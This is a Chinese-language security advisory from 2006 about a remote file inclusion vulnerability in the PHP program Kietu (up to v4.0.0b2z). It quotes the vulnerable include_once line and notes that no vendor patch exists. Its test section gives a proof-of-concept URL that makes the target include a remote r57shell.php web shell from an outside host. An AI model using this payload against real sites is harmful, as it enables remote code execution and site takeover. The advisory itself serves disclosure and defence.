2006-9-28 12:20:44
发布日期:2006-09-27
更新日期:2006-09-28
受影响系统:
Kietu Kietu <= v4.0.0b2z
描述:
BUGTRAQ ID: 20229
Kietu是一款由PHP编写的程序。
Kietu的url_hit.php脚本没有正确的验证用户输入,允许攻击者通过包含本地或外部资源的任意文件执行任意代码。
漏洞代码如下:
include_once $url_hit.'class/kdetect.class.php';
<*来源:D_7J (D_7J@yahoo.com)
链接:http://milw0rm.com/exploits/2438
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
http://www.example.com/[Script Path]/hit.php?url_hit=http://d4wood.by.ru/r57shell.php?
建议:
厂商补丁:
Kietu
-----
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://kietu.free.fr/
|
网友评论:(只显示最新10条。评论内容只代表网友观点,与本站立场无关!)